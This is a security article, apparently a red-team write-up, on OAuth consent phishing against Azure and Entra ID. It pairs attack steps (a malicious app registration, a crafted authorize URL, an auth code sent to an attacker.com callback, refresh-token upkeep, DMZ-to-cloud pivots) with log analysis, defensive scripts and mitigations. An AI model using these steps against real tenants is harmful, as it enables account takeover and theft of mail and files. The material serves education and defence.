Introduction

This article builds upon our previous article about consent phishing and takes a technology-specific approach to the considerations that an organisation should have concerning consent phishing in Azure and Entra ID (previously Azure AD) environments. This topic was also presented at 0xcon Johannesburg in November 2023 and BSides Cape Town in December 2023. A recording of the 0xcon talk can be found here.

We will do this by exploring the execution of an Entra ID consent phishing attack from both a red team perspective, which involves setting up the attack, and a blue team perspective, where we follow the alerts that the attack would generate. We will then use this knowledge to discuss some examples of where consent phishing can be used in the real world, and end with the protections that exist within Azure.

Background to consent phishing in Azure

Azure is Microsoft’s well-known cloud platform and is widely used by businesses across the world. It offers general cloud services such as elastic computing and data storage, but it also includes Identity and Access Management (IAM) through Entra ID, the cloud equivalent of Active Directory. In many organisations, a full compromise of Azure can give an attacker significant control over corporate and IT resources.

As part of its functionality, Azure allows third-party applications to be granted granular permissions to an Entra ID user account or to an Azure tenant’s resources. This is a legitimate implementation of the OAuth 2.0 protocol and is extremely useful for developers and users alike. However, it can be abused by threat actors to request excessive or dangerous permissions, an abuse also known as an illicit consent grant.

This attack vector is well known and is a consequence of the functionality permitted by the OAuth 2.0 protocol: if the configuration of an IdP allows third-party applications to request permissions, then attackers can request dangerous permissions. It is important to note that this attack does not abuse a vulnerability or misconfiguration within the protocol, but rather simply uses the protocol in a malicious manner. Consent phishing attacks have been around for several years; one example is the Upgrade application that was leveraged against Azure in January 2022.

Performing the Attack



As we explored in the previous article, consent phishing is an attack that abuses the functionality enabled by the OAuth 2.0 framework. Specifically, it tricks a user into giving an application unnecessary or dangerous permissions over their account. For reference, I have shown the OAuth flow from Microsoft’s documentation below, but we will not go deeper into how OAuth 2.0 works in this article.

OAuth 2.0 flow from Microsoft’s Documentation



To work through our example, the first thing that we need to do as a malicious actor is register our application with the Identity Provider (IdP), which in this case is Entra ID. The registration is required for two reasons: a consent phishing attack needs a unique URL on the IdP’s domain to send users to, and Entra ID needs to be able to trace the consent granted by a user back to a specific application. Without the registration, consent could not be tied to our malicious application once it was granted. This can be achieved by creating an app registration in Azure and allowing access to accounts from any organisation’s directory. The redirect URI specified in this step will be important later, and should be set to an endpoint on an attacker-controlled domain.

Once the application registration has been created, the application ID can be retrieved from the properties page of the application (Azure -> App Registrations -> DefinitelyASafeApp). This is a public value, which is important, as it is the value used in a consent request to identify the application that consent has been granted to. Our previous consent phishing article described that when an application requests consent from a user, it must have a list of scopes for its permissions, and must then redirect the user to their relevant IdP for them to perform the necessary authentication steps. This is achieved by the application redirecting the user to Azure with its application ID and the list of scopes it is requesting.

So what do we need next for this attack? Well, we have an application that has been registered with our targeted IdP; next, we need to build a URL to redirect the users to the IdP sign-on page, so that the consent can be granted to our application, and so that the IdP knows what scopes of consent we are asking for. The relevant URI for Microsoft Entra is:





https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=<Application ID>&response_type=code&scope=<Scopes>

The application ID from the app registration we created in Entra should be added to the above URL. We also need to decide on the permissions that we are going to request for the consent grants. Following the terminology of the OAuth 2.0 RFC, permissions in Azure are called scopes, with each scope representing a granular level of permission to an Entra ID account or the Entra ID tenant. Microsoft groups these scopes according to the different APIs that can use them; for this article, all the permissions we will be dealing with are used by the Microsoft Graph API.

By default, some requested permissions in Entra ID require Global Administrator approval, while others can be granted by normal users. A good rule of thumb is that if a user has full control and ownership over an object or resource, the user can grant an application consent to read and write to that object or resource. A couple of enticing consent requests that a red teamer could make without needing administrator consent are reading e-mails and reading files.
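As a minimal sketch of how the URL above is put together, the following Python snippet fills in the `client_id` and `scope` parameters. The application ID is a placeholder, the scope names `Mail.Read` and `Files.Read` are illustrative choices for "reading e-mails and files", and the optional `redirect_uri` parameter is an assumption that does not appear in the URL shown above.

```python
from urllib.parse import urlencode

AUTHORIZE_ENDPOINT = "https://login.microsoftonline.com/common/oauth2/v2.0/authorize"


def build_authorize_url(client_id, scopes, redirect_uri=None):
    """Return the authorisation URL for an application ID and a list of scopes."""
    params = {
        "client_id": client_id,
        "response_type": "code",
        # Scopes are sent as a single space-separated string.
        "scope": " ".join(scopes),
    }
    if redirect_uri is not None:
        # Assumption: only needed when the redirect URI is passed explicitly.
        params["redirect_uri"] = redirect_uri
    return f"{AUTHORIZE_ENDPOINT}?{urlencode(params)}"


url = build_authorize_url(
    "00000000-0000-0000-0000-000000000000",  # placeholder application ID
    ["Mail.Read", "Files.Read", "offline_access"],  # illustrative scopes
)
print(url)
```

Because the scopes live only in the query string, a reviewer can read exactly what is being requested from the link itself, before any consent prompt is shown.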

A full list of potential scopes and their need for admin consent can be found at https://learn.microsoft.com/en-us/graph/permissions-reference

Both of these consent grants, if successful, are likely to give a red teamer, at the least, access to sensitive information from their target. However, rather than trying to fully contextualise the impact here, I invite you, the reader, to think about what would happen if a threat actor had access to all your emails or all your online files. The consent prompt to grant this access would look as follows:

By default, the tabs that display more information in the image above are not open; the user would have to click them to see more information. The Unverified tag on the application will be discussed later in this article.

Now that we have our link and the authorisation scopes that we are requesting consent for, the last thing that we need to do is set the redirect URI in the app registration to our attacker-controlled web application. This is an important step, because at the end of the authentication and consent granting process, an authorisation code will be sent back to our domain that we can use to request our access tokens. Once consent is granted by a victim, the callback URL generated by Entra contains the authorisation code and looks similar to the following:

https://attacker.com/auth/complete?code=0.Aa4A0wkz0azcy0igRfJ1nErI9BKetv336oRMra49r2Y_Co6uAA0.AgABAAIAAAAtyolDObpQQ5VtlI4uGjEPAgDs_wUA9P8oY1Mm_S0DzMWxzGV1ChvuhtsScGm5lPMYqIIGM2eE-_BzjbYpwyyDzg2zuAKV-dL6iamoQhowsnbqis35YDg2xfBZDRpQvg6H2xLEE6rxFAcWnJgUuUlzLm3xxL-3fucrOdfUGwyCMgCahp9edN00oa0yXkB7pggLfaf6WgL8eDOkmGrl2uF7_-jyKj0F8KVsVmLCVpRet6STGw9hoisRLUZlLMHOrp7Vis-Xf-_gbQIjJegpBTxiCFH0tF1GXOYklvKcXrQen3k54vlXQrlHDnaRKGs4k1UD2dYxCJpF2O1lOyuuL2Tv1v0dK4819f17Vgn5fH2P1CwbWKVOaWKipbolHaidFhcJo-sLAP95crkos-s3c0js4oHYzzWNR9xs69L7djFq9zUSyrazA2sZT41FnESRzsqtqAt2rmjU6XfXfRxIzwqLFVDhojENNN_L1dNmrb17SfSbqVsDAPFat1ja_7zWgDGDXqVH5a4UImP6S44LvY6Y6vvcMIqAUNT_S0bMcGcwxE7orRvxEVkBgIZ1wqEyLUM3yKnLGIhz2QiJl8dL7sBnokDjRPrGrE3qESxOtlHmOU0eJAeTLAkWMV0uEC66wGLu0tIL6aYv9GDpSYZhZK2v3b2owk3aIm81w3osfivd_w6tW1l1y3Ous7Oc9W5N3o86Hml-gJzfCMwPuoFKDKLocN0QaE74-1nBASx1_wPOup_Wnh1EIimsKVe87gx3FePmGh01-Z9Pe40Ky3R6WEu37IrSbLxQllqQ5Yk&session_state=a6244267-c8e9-4abc-a20f-b2e25c335ca5#

Once the victim has been redirected back to the attacker-controlled web application domain, their involvement in the attack is done. The red teamer can now take the code from the redirect, which would be stored in the web logs of their web application, and submit it to Microsoft to get an access token and a refresh token that are valid for the user who granted consent, thus gaining access to the scopes that the user consented to. The access token is a JWT that makes claims about the application it was issued to and the scope(s) that it is authorised to use, while the refresh token is opaque to the application. An access token is valid for a random time between 60 and 90 minutes. The refresh token is used to retrieve new refresh tokens and access tokens. Microsoft documents a default refresh token lifetime of 24 hours for single-page applications and 90 days for other scenarios, and a refresh token replaces itself on use, so make sure to maintain it by requesting a new token before it expires (see here for details). If a refresh token expires, it is no longer usable and the application then needs to be re-authorised by having the user sign into the application again.

One thing that should be noted here is that even though the privileges are granted to the application, there are some scenarios where the actions performed by the application will be logged in Entra ID as being performed by the user who granted the consent, which we will look into later.
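To make the idea of token claims concrete, here is a minimal sketch that decodes the payload of a JWT access token and reports how long it has left to live. It does not verify the signature, so it is only suitable for inspection. The sample token is fabricated for illustration; the `scp` (delegated scopes) and `exp` (expiry) claim names are the ones we assume are present in the token.

```python
import base64
import json
import time


def decode_jwt_claims(token):
    """Decode the payload segment of a JWT WITHOUT verifying its signature."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected three dot-separated JWT segments")
    payload = parts[1]
    # base64url segments omit padding, so restore it before decoding.
    padded = payload + "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(padded))


def seconds_until_expiry(claims, now=None):
    """Return the number of seconds before the token's 'exp' claim is reached."""
    now = time.time() if now is None else now
    return claims["exp"] - now


def _b64url(obj):
    """Helper used only to fabricate the sample token below."""
    raw = json.dumps(obj).encode()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


# Fabricated sample token with hypothetical claim values.
sample_claims = {"scp": "Mail.ReadWrite offline_access", "exp": 1700003600}
sample_token = ".".join([_b64url({"alg": "none"}), _b64url(sample_claims), "sig"])

claims = decode_jwt_claims(sample_token)
print(claims["scp"].split())
print(seconds_until_expiry(claims, now=1700000000))
```

The same decoding is useful on the defensive side: when a suspicious token is recovered during an investigation, its claims show which scopes it carries.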

Alerts? What Alerts?

Assuming this attack was happening, how could a blue team perform threat hunting to detect that illicit consent grants have been approved? What alerts are generated by this activity?



To start, we should ask what kind of information we get from the logs generated when a user accepts an attacker’s illicit consent grant. To answer this, we will use a scenario where a malicious actor has successfully socially engineered our victim, JFrederickson, into granting consent to an application called “DefinitelyASafeApp”. Granting consent generates the following logs, which effectively just note that the application was added as a service principal to the environment and that consent was granted.

The logs do not explicitly state, in a human-readable format, which permissions were granted, which in this instance included the “Mail.ReadWrite” permission. However, there is at least enough information to show that a user granted consent to the malicious application.



However, what if an attacker was granted more elevated permissions (or was luckier) and JFrederickson ended up granting administrator consent to the application? Let’s say in this scenario that the application wants to create new users with high-level privileges (such as being a user administrator) and use them to maintain persistence. The logs would instead look like this:

Starting from the bottom and working up, the story that we can see from the logs is that JFrederickson provided consent to the ThinkGreenCorpWeb Application (New Goal, New App). In this case, JFrederickson is a Global Administrator and gave admin consent, although that is not clear from the audit logs that we have. We can, however, see that the application was granted User Management permissions and, if we expand the second-to-last line, we can also see the scopes that delegated permissions were granted for:



"Directory.ReadWrite.All User.ReadWrite.All RoleManagement.ReadWrite.Directory offline_access openid profile"The two logs above are simply the same general consent grant logs that we’ve seen so far; however, it should be noted that there is no explicit mention in these logs that admin approval was given. Rather, this would need to be inferred based on the scopes granted and/or the user who gave the consent. As we move up to the actions performed by the application, we can clearly see that the application was used to create the user and add them to a role. However, as the user was added to a role outside of Privileged Identity Management (PIM), there are logs generated that are associated with the user who gave consent to the application, namely JFrederickson, that state the he added them to a role outside of PIM.

This can be extremely misleading to threat hunting blue teams, as it could point towards a Global Administrator user being compromised rather than a malicious application abusing a consent grant. A natural consequence of this is that the security team might focus their response actions on securing the user account and not necessarily removing the malicious application performing the attack.
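Since admin consent has to be inferred from the granted scopes, a threat hunter could automate that inference. The sketch below takes a scope string like the one shown in the logs above and flags scopes that normally need administrator consent. The watchlist is an illustrative, deliberately incomplete assumption built from the three elevated scopes in this example; a real one should be derived from the Microsoft Graph permissions reference.

```python
# Illustrative and incomplete watchlist (assumption): delegated scopes that
# normally require administrator consent. Extend it from the Graph
# permissions reference before relying on it.
ADMIN_CONSENT_SCOPES = {
    "Directory.ReadWrite.All",
    "User.ReadWrite.All",
    "RoleManagement.ReadWrite.Directory",
}


def triage_consent(scope_string, watchlist=ADMIN_CONSENT_SCOPES):
    """Split a logged scope string and flag scopes that suggest admin consent."""
    granted = scope_string.split()
    watch = {s.casefold() for s in watchlist}
    elevated = sorted(s for s in granted if s.casefold() in watch)
    return {
        "granted": granted,
        "elevated": elevated,
        "likely_admin_consent": bool(elevated),
    }


logged = (
    "Directory.ReadWrite.All User.ReadWrite.All "
    "RoleManagement.ReadWrite.Directory offline_access openid profile"
)
result = triage_consent(logged)
print(result["likely_admin_consent"], result["elevated"])
```

A grant flagged this way points the investigation at the application and its service principal, rather than only at the user account whose name appears in the later role assignment logs.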

Pivot! Pivot! Pivot!

This is a useful technique, but how can we leverage this in a red team engagement to either gain access to an environment or to escalate our privileges in an environment – i.e. how could this technique be useful in an attacking context?

Well, as consent phishing is simply another tool in a red teamer’s arsenal, there are a number of ways it can be used. One of the more straightforward ways is to attempt consent phishing from an external perspective as a way to gain access to a company’s cloud environment. While, with the most permissive configuration, external consent phishing can be done using an unverified application, it becomes much easier if you have access to an Azure tenant that is part of the Microsoft Cloud Partner Program. In such a situation, you are able to phish targets with a more common consent configuration and the consent prompt for the phishing attempt would have a shiny blue Verified badge displayed for consent requests from the malicious application.

An interesting edge case to note is that if you already have access to an application that is registered within a targeted Azure tenant, the default consent grant setting allows users to grant consent to unverified applications registered in the same tenant as them.

Another interesting vector could allow a red teamer to pivot from a segregated DMZ into a cloud environment. Assume that you have breached a target’s external infrastructure and have code execution on a web server host in the DMZ, that this host is associated with an app registration in Azure, and that the app registration’s callback URL points to that host. In this position, it is possible to create a consent request with arbitrary scopes for the application, because the specific scopes are not defined anywhere in Azure when an app registration is created; they are only specified in the URL that is visited by the user granting consent. This could allow a suitably positioned attacker to request excessive consent for a legitimate and potentially trusted application that would not generally request those scopes. From this position, the application can then be leveraged to phish internal employees or its own users.

It should be noted that the consent we can request through this application is still restricted in the same manner as for any other application: if administrator approval is required for the user granting consent, it is still required for this attack path. Furthermore, a user goes through the entire consent process from the start if a new scope is requested, even if consent has been granted before.
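Because the scopes only appear in the consent URL, one way for a defender to spot this kind of abuse is to compare the scopes requested in an observed URL against what the application is known to need. The following is a minimal sketch of that comparison; the baseline dictionary, the application ID, and the idea that consent URLs are available from proxy logs or reported emails are all assumptions made for illustration.

```python
from urllib.parse import parse_qs, urlsplit

# Hypothetical baseline: the scopes each known application is expected to request.
EXPECTED_SCOPES = {
    "11111111-1111-1111-1111-111111111111": {"openid", "profile", "User.Read"},
}


def unexpected_scopes(consent_url, baseline=EXPECTED_SCOPES):
    """Return requested scopes that are not in the application's baseline."""
    query = parse_qs(urlsplit(consent_url).query)
    client_id = query.get("client_id", [""])[0]
    requested = query.get("scope", [""])[0].split()
    # Unknown applications have an empty baseline, so every scope is flagged.
    allowed = {s.casefold() for s in baseline.get(client_id, set())}
    return [s for s in requested if s.casefold() not in allowed]


observed = (
    "https://login.microsoftonline.com/common/oauth2/v2.0/authorize"
    "?client_id=11111111-1111-1111-1111-111111111111"
    "&response_type=code&scope=openid%20User.Read%20Mail.ReadWrite"
)
print(unexpected_scopes(observed))
```

In this example the trusted application suddenly asks for `Mail.ReadWrite`, which is the kind of drift that would be worth investigating.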

Assuming one of these attacks has been successful, we would then have some form of privileged access to user accounts within the target’s Azure and Entra ID environment, accomplishing our original goal.

Protections, preventions, and mitigations

From a technical perspective in Azure, the best thing we can do is limit who can give consent to what. Microsoft has guidance for administrators on locking down consent in their environment at https://learn.microsoft.com/en-us/azure/active-directory/manage-apps/configure-user-consent?pivots=portal. For user consent, there are three configuration options:

- Do not Allow User Consent – This is the most secure option, as all consent grants require Global Administrator approval. However, this could also increase the burden on administrators – especially in large environments with thousands of users. The need to allow for consent grants for a given environment should be determined, and if there is no business case for these, this option should be selected.

- Verified Consent – Allow users to grant consent to Verified applications. This should be the minimum requirement in any organisation’s environment.

- No Restrictions – Any user can give consent for permissions that do not require admin approval. This is a bad idea, since it enables widespread consent phishing attacks against the organisation, originating from any Entra ID tenant.
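As a rough sketch of how an administrator might audit which of these options is in force, the function below maps the permission grant policy IDs assigned to the default user role onto the three options above. The policy identifiers (`microsoft-user-default-legacy` and `microsoft-user-default-low`) and the assumption that the list comes from the tenant's authorization policy in Microsoft Graph should both be checked against current Microsoft documentation. Note also that the built-in "low" policy is understood to restrict users to selected low-impact permissions as well as verified publishers.

```python
# Assumed prefix and identifiers of the built-in user consent policies.
SELF_GRANT_PREFIX = "managepermissiongrantsforself."
LEGACY_POLICY = SELF_GRANT_PREFIX + "microsoft-user-default-legacy"
LOW_POLICY = SELF_GRANT_PREFIX + "microsoft-user-default-low"


def classify_user_consent(policy_ids):
    """Map assigned permission grant policy IDs to a user consent option."""
    ids = {p.casefold() for p in policy_ids}
    self_grants = {p for p in ids if p.startswith(SELF_GRANT_PREFIX)}
    if not self_grants:
        # No self-service grant policy assigned: users cannot consent at all.
        return "Do not Allow User Consent"
    if LEGACY_POLICY in self_grants:
        return "No Restrictions"
    if LOW_POLICY in self_grants:
        return "Verified Consent"
    return "Custom policy"


print(classify_user_consent([]))
print(classify_user_consent(["ManagePermissionGrantsForSelf.microsoft-user-default-legacy"]))
print(classify_user_consent(["ManagePermissionGrantsForSelf.microsoft-user-default-low"]))
```

Anything reported as "No Restrictions" is the configuration that leaves the tenant open to consent phishing from any Entra ID tenant.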

Organisations should at least implement the Verified Consent requirement, so that users can only consent to verified applications. A verified application is any application that has been created by an Azure account that is part of the (formerly) Microsoft Partner Network (MPN) or (currently) Cloud Partner Program (CPP). We did not investigate how easy or difficult it is to join one of these programs. It should be noted, however, that a black hat hacker would not necessarily need to join the program to attempt a phishing campaign; a viable option would be to compromise an Azure tenant that has already joined the program, or to compromise a web server host used as part of a legitimate third-party application (as discussed earlier).

However, as consent phishing is ultimately a social engineering attack, a key defence is user awareness. A user who is aware of the potential danger and thinks before giving consent is the best protection for themselves and their organisation against consent phishing. That is because the functionality being targeted is useful and legitimate and, as with all good offensive techniques, consent phishing just takes useful functionality and uses it in a malicious way. Consent grants don’t hack people, people hack people.

Conclusion

All in all, consent phishing is not an end-of-the-world crisis for cyber security. While it is a useful tool in the belt of a red teamer, it would be difficult to exploit on engagements against companies with a mature security posture. However, it could pose an interesting vector for testing third-party trust and compromise. If you can phish from the perspective of a verified company, then it becomes an even more powerful tool. It can also be leveraged as a potential pivot from a well-protected DMZ network into a target’s cloud environment.

The most important defence against consent phishing, as with all phishing, is user awareness and education. Phishing, in general, is an attack that relies on attackers tricking users. Thus, the less understanding that a user has of the technologies that they are using, the easier it is for them to be tricked. Due to this, a key defence is to educate users to give them this understanding and thus make it harder for them to make mistakes. As an example, knowing that a consent prompt could be dangerous may prompt a user to spend a couple more seconds thinking about it, which could protect them from compromise, instead of simply accepting a consent request without a thought, even if that consent request has a big blue Verified badge.

Furthermore, it is also important for users to know what to do if they make a mistake and who they should contact. People are human and mistakes are bound to happen. Simple communication channels for reporting a potential compromise work wonders in mitigating the overall impact of an attack on a company.